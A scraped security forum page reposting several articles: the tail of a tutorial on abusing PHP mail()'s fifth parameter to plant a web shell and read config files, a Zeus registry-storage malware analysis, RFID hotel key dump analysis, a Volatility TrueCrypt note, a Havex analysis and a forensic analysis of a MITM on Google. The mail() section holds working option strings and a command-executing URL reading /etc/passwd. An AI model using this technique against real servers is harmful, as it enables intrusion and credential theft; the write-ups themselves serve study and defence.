reason why we want it there is because this is globally writable. Second the path and filename for the log is changed to /var/www/html/rce.php using the -X argument. Keep in mind that this path will not always be the same. You will have to craft this to fit the targets file system. If we now point our browser at http://example.com/rce.php it will display the log for the attempted delivery. But since we added the PHP code to the $subject variable, we can now add the following query ?cmd=[some command here]. For example http://example.com/rce.php?cmd=cat%20/etc/passwd. If you want you could also create a Local/Remote File Inclusion vulnerability as well. To do this, just change system() to include(). This can be handy if wget is not available, or you’re not able to include a remote web shell. It’s also important to know, that it’s not only the subject field that can be used to inject arbitrary code. The content of all the fields, except the fifth, is written to the log. Read files on the server Another way to exploit this is to directly read files on the server. This can be done by using the -C argument as shown above. I have made a dummy configuration file just to show how it works $to = ‘a@b.c'; $subject = ''; $message = ''; $headers = ''; $options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php'; mail($to, $subject, $message, $headers, $options); This creates a file named evil.php with the following content 11124 >>> /var/www/html/config.php: line 1: unknown configuration line "<?php" 11124 >>> /var/www/html/config.php: line 3: unknown configuration line "dbuser = 'someuser';" 11124 >>> /var/www/html/config.php: line 4: unknown configuration line "dbpass = 'somepass';" 11124 >>> /var/www/html/config.php: line 5: unknown configuration line "dbhost = 'localhost';" 11124 >>> /var/www/html/config.php: line 6: unknown configuration line "dbname = 'mydb';" 11124 >>> No local mailer defined Now we have managed to extract very sensitive data, and there’s a lot of other things we can extract from the server. A real-life scenario where this can become a reality Scenario #1: Admin panel To be honest I actually had to think for this for a file. I mean, who would be so stupid that they let their users control the sendmail parameters. Well, it really doesn’t have to be that stupid. So consider this following scenario. You have an admin panel for your website. Just like every other admin panel with respect for itself it let’s your set different settings for sending emails. Stuff like port, smtp, etc. But not only that, this administration panel actually let’s you monitor your mail logs, and you can decide where to store the logs. Suddenly the idea of the values of the 5th parameter being controlled by an end user doesn’t sound that stupid anymore. You would of course not let this be modified from the contact form But admins wouldn’t hack their own site would they.. So in combination with other attacks that results in unauthorized access, this can become a real threat since you can actually create vulnerabilities that was not originally in the application. Scenario #2: Email service The idea around this scenario spawned from the original post linked to in the beginning of the article. So, let’s consider we are running a website where a person can send an email to a recipient. In this case, the user must manually set the from address. Now, in the code we use the -f argument along with the user inputted from address. Now if this from field is poorly validated and sanitized the user can continue writing the required arguments and values directly. How to detect a possible vulnerability The fastes way to detect any possibility for this in code is to use Linux’s grep command, and recursively look for any use of mail() with all 5 parameters in use. Position yourself in the root of whatever project you want to check and execute the following command. This will return all code lines that uses mail() with five parameters. grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" * There will probably be some false positives, so if you have any suggestions to improve this to make it even more accurate, please let me know! Summary This is not something that you will stumble across often. To be honest I don’t expect to ever see this in the wild at all, though it would be really cool to do so, but you never know as explained in the “real-life scenario” section. Still, I do find this to be really interesting, and it makes you think “what other PHP functions can do this?” I hope you enjoyed the article and if you have any comments you know what to do Sursa: Exploit PHP’s mail() to get remote code execution | Security Sucks
  20. Da. Bine, cam rare cazurile in care ai acces la un dump de memorie al cuiva. Daca ai avea acces la acel calculator ai avea deja acces la toate fisierele montate cu TrueCrypt.
  21. Thursday, September 4, 2014 Malware Using the Registry to Store a Zeus Configuration File This blog was co-authored by Andrea Allievi. A few weeks ago I came across a sample that was reading from and writing a significant amount of data to the registry. Initially, it was thought that the file may be a binary, but after some analysis it was determined that the file is a configuration file for Zeus. Within this blog post we take a look at our analysis of the data I/O in the registry. Initial Stages of Infection The scope of this paper is the analysis of the registry write. This section is a brief overview of what happens when the malware is executed. Unpacks Creates a copy of itself in the tmp directory Injects itself into explorer.exe Starts a thread that executes the injected code The code injected into Explorer.exe becomes the focus of our analysis. To get started, an infinite loop was added to the entry point of the injected code and Ollydebug was used to attached to Explorer.exe. Debugging injected code in this manner was previously covered here. Analysis After attaching the debugger and prior to continuing execution, a breakpoint is set on Advapi32.RegSetValueExW() before the large data write is made. This breakpoint is tripped multiple times by multiple threads within Explorer.exe. Most of the time the threads are related to the injected ZBot code. It turns out that the same thread is used consistently for writing to this registry key. Several sub-keys are created to store data that the application uses at a later time.The names of the sub-keys are created using an index value that is combined with other data to appear random. For instance, the key “2f0e9h99” was created by combining a hash of the User SID with the index value 0x9A. Throughout this paper, the registry key will be referenced by either name or index. A Series of Registry Writes This section establishes a pattern to the registry activity that can be used to help figure out what the malware is accomplishing with the registry I/O. The registry activity centers around writing to the following key: HKUSERS\<sid>\Software\Microsoft\Ujquuvs. The “ujquuvs” is dynamically generated by the application and will change between executions. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Ujquuvs Registry Key Prior to[/TD] [/TR] [/TABLE] Prior to the first registry write of interest the Ujquuvs sub-key contains the values shown in the above graphic. Throughout this section we’ll see that new value names are generated and data is cycled between the keys. One of the first chunks written to the registry value 2f0e9h99 is a binary string that is 475 bytes in length. The following graphic shows the call to the Windows Advapi32.RegSetValueExW() procedure made by the malware. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]RegSetValueExW() Stack[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]First Registry Write to 2f0e9h99[/TD] [/TR] [/TABLE] The above graphic displays the binary string data that was written to the registry. Although 475 bytes is a significant chunk of data written to the registry it is not what caused an alarm. The registry write I am looking for is greater than 3000 bytes. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Second Registry Write to 2f0e9h99[/TD] [/TR] [/TABLE] Another 475 byte write occurs, but the data is different than the first write. It is worth noting that although the data is different the first four bytes appear to be the same “5D BB 95 50” pattern. This may be a header used to distinguish the data. The next call to RegSetDataExW will write 3800 bytes to the registry. The binary data was replaced with alphanumeric data (possibly base64). Another assumption can be made. The original binary data is encoded and then stored back to the registry. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Alphanumeric Data Written to 2f0e9h99[/TD] [/TR] [/TABLE] This is one of the large data writes that was flagged by the sandbox. Continuing on we see several more data writes all of which are variations of the above. The data cycles between binary strings and alphanumeric strings, and the string lengths vary. One of the largest data writes was an 7200 byte alphanumeric string. Registry Reads Along with the registry writes there are usually corresponding registry reads. The data located in 2f0e9h99 is pulled into a buffer and manipulated by the application. Once the data is read, decoded from alphanumeric encoding to a long list of 475 byte chunks of binary data. These chunks of data contain a hash to identify specific chunks within the list. Whenever a new chunk of data is received the data contained in 2f0e9h99 is decoded and the hash value of the received chunk of data is compared against each chunk that exists already within the registry. If these hash values match, then the that registry data chunk is replaced with the incoming data. Otherwise the data is appended to the bottom of the list. Once the input queue is empty the calls to read or write to the registry stop. The thread has not been killed, but it is (most likely) suspended until some event occurs. The next section combines these findings with further analysis to track down the source of the registry writes. ZBotThread_1 Procedure Walking through the executable with a debugger led us to the source of the registry writes. A thread is created and starts executing the code at address 0x41F579. From here on out this code is going to be referred to as ZBotThread_1(). This procedure is the backbone for all activity related to this registry key. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Network Socket Loop[/TD] [/TR] [/TABLE] After several instructions for initializing various data structures, ZBotThread_1() initializes a network socket to communicate with a remote server. Once traffic is received the IP address is verified against an IP blacklist of network address ranges that exists within a data structure used throughout the application. These IP Address ranges appear to be owned by various AV vendors (indicated here). Here is the list of blacklisted address ranges with the corresponding netmasks: 64.88.164.160 255.255.255.224 64.233.160.0255.255.224.0 65.52.0.0255.252.0.0 66.148.64.0 255.255.192.0 84.74.14.0 255.255.255.0 91.103.64.0255.255.252.0 91.200.104.0 255.255.255.0 91.212.143.0 255.255.255.0 91.212.136.0 255.255.255.0 116.222.85.0255.255.252.0 128.130.0.0 255.254.0.0 131.107.0.0 255.255.0.0 150.26.0.0 255.255.255.0 193.71.68.0255.255.255.0 193.175.86.0 255.255.255.0 194.94.127.0 255.255.255.0 195.74.76.0 255.255.255.0 195.164.0.0 255.255.0.0 195.168.53.48 255.255.0.0 195.169.125.0 255.255.255.0 204.8.152.0255.255.248.0 207.46.130.0 255.255.0.0 208.118.60.0255.255.240.0 212.5.80.0 255.255.255.192 212.67.88.64 255.255.224.0 Once the IP address is verified the payload is decrypted and the data is initialized into the following data structure (sub_41F9C6): [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]ZBOT_SOCKET_DATA structure[/TD] [/TR] [/TABLE] Throughout this post we will refer to this as ZBOT_SOCKET_DATA. Each datagram payload contains this data structure. The lpDataBuff points to a buffer that contains the data that will eventually be written to the registry. In addition, the dataBuffHeader[0x2C] contains the first 44 bytes of the decrypted received data. These bytes contain critical information about the entire data chunk. After a few checks to verify the integrity of the data, ZBotThread_1 calls AnalyseSockDataAndUpdateZBot (sub_43D305). This function will take the 20 byte hash of the data contained within the data chunk header (first 44 bytes) and compares it against a list of other hashes. This list of hashes is built out of previously received datagrams. If the hash is part of the list then the data is dropped. Otherwise, the hash is appended to the end of the list. Next, AnalyseAndFinalizeSockData (sub_41D006) is called to begin the process of adding the data to the registry. Once inside the function, the data type (dataBuffHeader+0x3) is checked. There are several different data types, but the one that is relevant for the purposes of this blog post is type 0x6. This signifies the end of the data stream and the malware can proceed to save the data to registry key 2f0e9h99 The type 0x6 code branch calls VerifyFinalSckDataAndWriteToReg (sub_436889). This function strips the 0x2C length header from the socket data before verifying the integrity using RSA1. Finally, if the data integrity is good, the WriteSckDataToReg function is called. Writing Socket Data to the Registry The previously received socket data has already been written to registry key 2f0e9h99. At this point, the socket data needs to be merged with the data contained within the registry key. Before this can occur, the data is currently alphanumerically encoded (see the registry write section above). The decoded data is a series of 0x1D0 hex byte chunks. Each chunk is a ZBOT_SOCKET_DATA structure. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Alphanumeric Encoded Data in Memory[/TD] [/TR] [/TABLE] The hash of the socket data is compared against the hash of each chunk contained within the list of chunks. If the hashes match, then that registry data chunk is replaced with the network socket data. Otherwise the network socket data is appended to the end of the list. Once the update is completed the registry data is (once again) alphanumerically encoded and written back to the 2f0e9h99 registry key. It’s worth noting that our sample dropper can encode the original data in several different ways: Base64, and 3 customized XOR algorithms (see function at VA 0x4339DE for all the details). Summary Using the registry as a way to store and update a configuration is a clever idea. The multiple writes and reads that come with constructing the file with a registry key will raise alarms. It’s what originally grabbed our interest. This blog post covers a small percentage of the functionality of this malware sample. Some of the functionality that we uncovered denote a high level of sophistication by the author. We strongly encourage others to download a copy and crack open their debuggers. Sample MD5 Hashes: Dropper: DA91B56D5A85CAADDB00908220D62B92 Injected Code: B4A00F4C6F025C0BC12DE890A2C1742E Written by Shaun Hurley at 1:00 PM Sursa: VRT: Malware Using the Registry to Store a Zeus Configuration File
  22. RFID, when the manufacturer matters Nowadays we can find RFID technology almost everywhere: in supermarkets (anti-theft), in assembly lines (identify & track items), in highways (tolls), in public transportation, in your passport and your credit card and it is also used by many companies and by hotels for access management. This post is about the latter. Indeed, during my trips, should it be for business or for holidays, I have stayed in many hotels. Some of them were still using good old keys like you do at home, most of them still use magnetic cards and some were relying on RFID cards to give you access to your room. Unfortunately, the security level of such RFID access management highly depends on the manufacturer as we will see. First, let’s begin with the tools I use. I started messing with RFID more than a year ago and today, I mostly rely on two tools: A proxmark3 which is a really awesome tool, able to deal with low frequency tags (120-135 kHz) and high frequency tags (13.56 MHz) but it’s pretty expensive, you have to handle external antennas and it relies on a dedicated client An OpenPCD 2 which only deals with a limited amount of high frequency tags but it’s opensource, credit card sized, and natively supported with libnfc and related tools. So, basically, proxmark3 is useful when you are at home or at the office and it is mandatory for specific RFID technologies but usually, when I travel, I try to keep my hand-luggage as light as possible. That’s why I mostly rely on my Android tablet and why I avoid carrying specific cables (proxmark uses one of those between the main PCB and the antenna). To still be able to mess with RFID/NFC technologies I might encounter while travelling, I cross-compiled a recent version of libnfc and mfoc to reasily crack Mifare Classic keys. There is also a tool called mfcuk but unfortunately this one had never worked so far… It only displays timing errors and never finishes. By googling, I don’t seem to be the only one encountering issues with it… I won’t go into details about all kind of RFID tags that you might encounter but I am going to detail some of the NXP tags inside their Mifare family, which still seems the most popular ones for 13.56 MHz tags: Mifare Ultralight (64 bytes memory divided into 16 pages of 4 bytes, almost no protection) Mifare Classic (1KB or 4KB memory, divided into blocks, with r/w protection relying on two 6 bytes keys and custom cryptography algorithm called Crypto1 which is broken) Mifare Plus (2KB or 4KB memory, adds AES-128 cipher to the Mifare Classic tag) Mifare DESfire (2KB, 4KB or 8KB and uses DES cipher) All those cards have a read-only area at the beginning of the memory that has been set by the manufacturer. More details about NXP Mifare family here. OK, enough “theory” for now So far, I encountered two manufacturers of RFID key systems dedicated to hotels: VingCard Elsafe, a Norwegian company Kaba Ilco, a Swiss or German company VingCard seems to be quite an old player in hotel locks as I have already seen cards like those: They might ring a bell for those of my readers who began working with computers when punch cards were the only way to interface with a computer ;-) But let’s go back to recent wireless technologies. As far as I can tell, VingCard uses Mifare Ultralight tags for their locks. If you have read carefully the last paragraphs, you may rememer that this particular kind of token lacks security measures: anybody can freely read the content (64 bytes of data). On the other side, Kaba is using Mifare Classic 1K cards for the customer’s keys and Mifare Classic 4K for manager’s keys (sort of master key + required to program customer’s keys). At least, on those, we found a bit of security. Unfortunately, crypto1, NXP’s cipher algorithm, is broken and you can recover all the keys in a matter of minutes (or something only a few seconds) with the tools I mentionned (mfoc / mfcuk or proxmark3). My first goal to understand how those keys work was to dump them, several times, entering the room between dumping attempts just to check if it has a counter stored in it. At least, I expect to find, maybe encoded in a weird way: the room number start date of my stay duration of the stay Also, to get extra dumps, I went back at the reception desk, asking them to program again my key because it was not working anymore or even asking them a new key because I seemed to have lost the first one (of course, I have given back both keys at checkout to avoid extra charges). Another thing to try when you have friends or family in the same hotel is to dump their keys too, specially if they are on the rooms next to yours (or at least on the same floor in case the floor is also encoded in the card). This way I was able bindiff the dumps and try to find useful stuff. Let’s begin with VingCard. Here is the result while running vbindiff agains two different keys encoded for the same room: That’s a lot of red! The first few bytes have to be different because it is the “unique ID” of the tag. But if we take a closer look at those dumps, we can see a pattern: one byte is repeated a lot on each dump in the red part. This value might be used to XOR the useful content. And the 4 final bytes might be a checksum value. Note also the constant 0x21 value across those dump at offset 0x13. Surprisingly, it matches the length of the big red block… Let’s try again vbindiff after XORing the 33-bytes red memory block… That’s definitely better! But we will have to found out later how this byte is computed… The next assumption we can take is for the three bytes located at 0x1F-0x21: on this particular hotel, I was given two room keys at once. So it might be the “key number” or something related. Next step is to compare keys encoded for two different rooms within the same hotel (after XORing their respective blocks of course): Bingo! We still have the same differences we have seen. Appart from that, only two bytes have changed between those cards. Those have to be the room number (or at least some sort of lock ID number). Also, if you look carefully at the last two screenshots, you may notify that the byte at offset 0x1F only has 2 possible values so far: 0x42 or 0x82. As it was a short stay (1 night), I wasn’t able to go deeper on those (trying to figure out the duration encoding and things like that). But remember, we still have to find how the XOR key is computed and what kind of checksum is used. Well, for that part, I may disappoint you but no luck so far If any of my readers have a clue, please leave it in the comments and I will test it against all the dumps I have. At the beginning I was talking about comparing the badly designed VingCard RFID system against Kaba Ilco’s one. Long story short, by applying the exact same method, I can tell you that this one seems pretty good in several points: Mifare Classic keys (A and seem to be derived from the UID of the tag but despite a whole bunch of dumps, I wasn’t able to find an obvious algorithm While bindiff-ing two dumps, I always ended up with two completely different 16-bytes blocks even after having my key reprogrammed. Marketing brochures states that they use cryptography so my guess would be that this is an encrypted block, depending on the Mifare Classic 4K tag (the Manager key) that has been used to program it. Moreover, the brochure also states that the cipher key is renew every 30 days. Going further on Kaba Ilco’s system would require to use the proxmark3 for passively sniffing RFID exchanges between the tag and the lock. As a conclusion, we can say that every manufacturer states that his system is secure but one should really ensure that it actually is, either by auditing the system himself or by relying on a third-party actor that can do that. by Jean-Michel Picod Sursa: A little bit of everything • RFID, when the manufacturer matters...
  23. [h=3]Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption[/h]This video shows how to use Volatility’s new Truecrypt plugins to defeat disk encryption on suspect computers running 64-bit Windows 8 and server 2012. The video is narrated by Apple's text to speech and you can find the actual text on the Youtube page. The live/in-person demo was given at the @Toolswatch Blackhat Arsenal. Posted by Michael Hale Ligh at 10:08 AM Sursa: Volatility Labs: Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption
  24. Analysis of Havex Published on 2014-09-03 13:00:00. Tools IDA 6.6 demo PE.explorer Static analysis Havex is a well-known RAT. Recently a new plugin appeared and it targets ICS/SCADA systems. We found many different samples. Let’s start by looking at one. MD5sum: 6bfc42f7cb1364ef0bfd749776ac6d38 6bfc42f7cb1364ef0bfd749776ac6d38 SHA1sum: db8ed2922ba5f81a4d25edb7331ea8c0f0f349ae 6bfc42f7cb1364ef0bfd749776ac6d38 All files are just simple Windows 32-bit DLLs, with no obfuscation, not packed. Nothing creepy! Take a look at the import table. It uses basic anti-debugging tricks (IsDebuggerPresent, GetTickCount…), no winsocket API are call. The most interesting is the import table from MPR.dll. According to the MSDN, WNet* functions are used to enumerate networks resources and connections. If we look at the Unicode strings, we see clearly something interesting. Looking at string’s reference, we find a function that scans the LAN network. Just after scanning the network, another function that calls WNetEnum* API functions we have seen previously in the import table. And it calls WriteLogs, as I named it. It writes what it finds into a log file in %TEMP% directory. After scanning the LAN, more interesting things happen. It is going to scan for OPC servers. But how can this be done? Look at the sub_100019E7 function: it starts by creating a thread. It launches COM API functions. Parameter Unk_10030C70 has the value 9DD0B56C-AD9E-43EE-8305-487F3188BF7A. It is uses to get a list of servers (IID_IOPCServerList2). Clsid 6C0B50D-09D9-E0AD-0EE4-3835487F31880BF7A is used to retrieve the COM class factory for component (CLSID_OPCServerList). It searches OPC Tags: All it finds is written to a file, and sent to the C&C by the RAT. Conclusion: This Havex plugin is not difficult to analyse and understand, it does not attack, but is clearly designed to spy industrial networks. References: MSDN: WNetOpenEnum WNetEnumRessource CoInitializeEx CoCreateInstanceEx Article: F-secure Sursa: https://www.malware.lu/articles/2014/09/03/analysis-of-havex.html
  25. Analysis of Chinese MITM on Google The Chinese are running a MITM attack on SSL encrypted traffic between Chinese universities and Google. We've performed technical analysis of the attack, on request from GreatFire.org, and can confirm that it is a real SSL MITM against Google and that it is being performed from within China. We were contacted by GreatFire.org two days ago (September 3) with a request to analyze two packet captures from suspected MITM-attacks before they finalized their blog post. The conclusions from our analysis is now published as part of GreatFire.org's great blog post titled “Authorities launch man-in-the-middle attack on Google”. In their blog post GreatFire.org write: From August 28, 2014 reports appeared on Weibo and Google Plus that users in China trying to access google.com and google.com.hk via CERNET, the country’s education network, were receiving warning messages about invalid SSL certificates. The evidence, which we include later in this post, indicates that this was caused by a man-in-the-middle attack. While the authorities have been blocking access to most things Google since June 4th, they have kept their hands off of CERNET, China’s nationwide education and research network. However, in the lead up to the new school year, the Chinese authorities launched a man-in-the-middle (MITM) attack against Google. Our network forensic analysis was performed by investigating the following to packet capture files: [TABLE] [TR] [TH]Capture Location[/TH] [TH]Client Netname[/TH] [TH]Capture Date[/TH] [TH]Filename[/TH] [TH]MD5[/TH] [/TR] [TR] [TD]Peking University[/TD] [TD]PKU6-CERNET2[/TD] [TD]Aug 30, 2014[/TD] [TD]google.com.pcap[/TD] [TD]aba4b35cb85ed218 7a8a7656cd670a93[/TD] [/TR] [TR] [TD]Chongqing University[/TD] [TD]CQU6-CERNET2[/TD] [TD]Sep 1, 2014[/TD] [TD]google_fake.pcapng[/TD] [TD]3bf943ea453f9afa 5c06b9c126d79557[/TD] [/TR] [/TABLE] Client and Server IP adresses The analyzed capture files contain pure IPv6 traffic (CERNET is a IPv6 network) which made the analysis a bit different then usual. We do not disclose the client IP addresses for privacy reasons, but they both seem legit; one from Peking University (netname PKU6-CERNET2) and the other from Chongqing University (CQU6-CERNET2). Both IP addresses belong to AS23910, named "China Next Generation Internet CERNET2". Peking University entrance by galaygobi. Licensed under Creative Commons Attribution 2.0 Chongqing University gate by Brooktse. Licensed under Creative Commons Attribution-Share Alike 3.0 The IP addresses received for Google were in both cases also legit, so the MITM wasn't carried out through DNS spoofing. The Peking University client connected to 2607:f8b0:4007:804::1013 (GOOGLE-IPV6 in United States) and the connection from Chongqing University went to 2404:6800:4005:805::1010 (GOOGLE_IPV6_AP-20080930 in Australia). Time-To-Live (TTL) Analysis The Time-To-Live (TTL) values received in the IP packets from Google were in both cases 248 or 249 (note: TTL is actually called ”Hop Limit” in IPv6 nomenclature, but we prefer to use the well established term ”TTL” anyway). The highest possible TTL value is 255, this means that the received packets haven't made more than 6 or 7 router hops before ending up at the client. However, the expected number of router hops between a server on GOOGLE-IPV6 and the client at Peking University is around 14. The low number of router hops is is a clear indication of an IP MITM taking place. CapLoader with both capture files loaded, showing TTL values Here is an IPv6 traceroute from AS25795 in Los Angeles towards the IP address at Peking University (generated with ARP Networks' 4or6.com tool): #traceroute -6 2001:da8:201:1374:8ea9:82ff:fe3c:322 1 2607:f2f8:1600::1 (2607:f2f8:1600::1) 1.636 ms 1.573 ms 1.557 ms 2 2001:504:13::1a (2001:504:13::1a) 40.381 ms 40.481 ms 40.565 ms 3 * * * 4 2001:252:0:302::1 (2001:252:0:302::1) 148.409 ms 148.501 ms 148.595 ms 5 * * * 6 2001:252:0:1::1 (2001:252:0:1::1) 148.273 ms 147.620 ms 147.596 ms 7 pku-bj-v6.cernet2.net (2001:da8:1:1b::2) 147.574 ms 147.619 ms 147.420 ms 8 2001:da8:1:50d::2 (2001:da8:1:50d::2) 148.582 ms 148.670 ms 148.979 ms 9 cernet2.net (2001:da8:ac:ffff::2) 147.963 ms 147.956 ms 147.988 ms 10 2001:da8:[REDACTED] 147.964 ms 148.035 ms 147.895 ms 11 2001:da8:[REDACTED] 147.832 ms 147.881 ms 147.836 ms 12 2001:da8:[REDACTED] 147.809 ms 147.707 ms 147.899 ms As can be seen in the traceroute above, seven hops before the client we find the 2001:252::/32 network, which is called “CNGI International Gateway Network (CNGIIGN)”. This network is actually part of CERNET, but on AS23911, which is the network that connects CERNET with its external peers. A reasonable assumption is therefore that the MITM is carried out on the 2001:252::/32 network, or where AS23910 (2001:da8:1::2) connects to AS23911 (2001:252:0:1::1). This means that the MITM attack is being conducted from within China. Response Time Analysis The round-trip time between the client and server can be estimated by measuring the time from when the client sends it initial TCP SYN packet to when it receives a TCP SYN+ACK from the server. The expected round-trip time for connecting from CERNET to a Google server overseas would be around 150ms or more. However, in the captures we've analyzed the TCP SYN+ACK package was received in just 8ms (Peking) and 52ms (Chongqing) respectively. Again, this is a clear indication of an IP MITM taking place, since Google cannot possibly send a response from the US to CERNET within 8ms regardless of how fast they are. The fast response times also indicate that the machine performing the MITM is located fairly close to the network at Peking University. Even though the machine performing the MITM was very quick at performing the TCP tree-way handshake we noticed that the application layer communication was terribly slow. The specification for the TLS handshake (RFC 2246) defines that a ClientHello message should be responded to with a ServerHello. Google typically send their ServerHello response almost instantly, i.e. the response is received after one round-trip time (150ms in this case). However, in the analyzed captures we noticed ServerHello response times of around 500ms. X.509 Certificate analysis We extracted the X.509 certificates from the two capture files to .cer files using NetworkMiner. We noticed that both users received identical certificates, which were both self signed for “google.com”. The fact that the MITM used a self signed certificate makes the attack easily detectable even for the non-technical user, since the web browser will typically display a warning about the site not being trusted. Additionally the X.509 certificate was created for ”google.com” rather than ”*.google.com”. This is an obvious miss from the MITM'ers side since they were attempting to MITM traffic to ”www.google.com” but not to ”google.com”. NetworkMiner showing list of X.509 certificates extracted from the two PCAP files Certificate SHA1 fingerprint: f6beadb9bc02e0a152d71c318739cdecfc1c085d Certificate MD5 fingerprint: 66:D5:D5:6A:E9:28:51:7C:03:53:C5:E1:33:14:A8:3B A copy of the fake certificate is available on Google drive thanks to GreatFire.org. Conclusions All evidence indicates that a MITM attack is being conducted against traffic between China’s nationwide education and research network CERNET and Google. It looks as if the MITM is carried out on a network belonging to AS23911, which is the outer part of CERNET that peers with all external networks. This network is located in China, so we can conclude that the MITM was being done within the country. It's difficult to say exactly how the MITM attack was carried out, but we can dismiss DNS spoofing as the used method. A more probable method would be IP hijacking; either through a BGP prefix hijacking or some form of packet injection. However, regardless of how they did it the attacker would be able to decrypt and inspect the traffic going to Google. We can also conclude that the method used to perform the MITM attack was similar to the Chinese MITM on GitHub, but not identical. Sursa: Analysis of Chinese MITM on Google - NETRESEC Blog
×
×
  • Create New...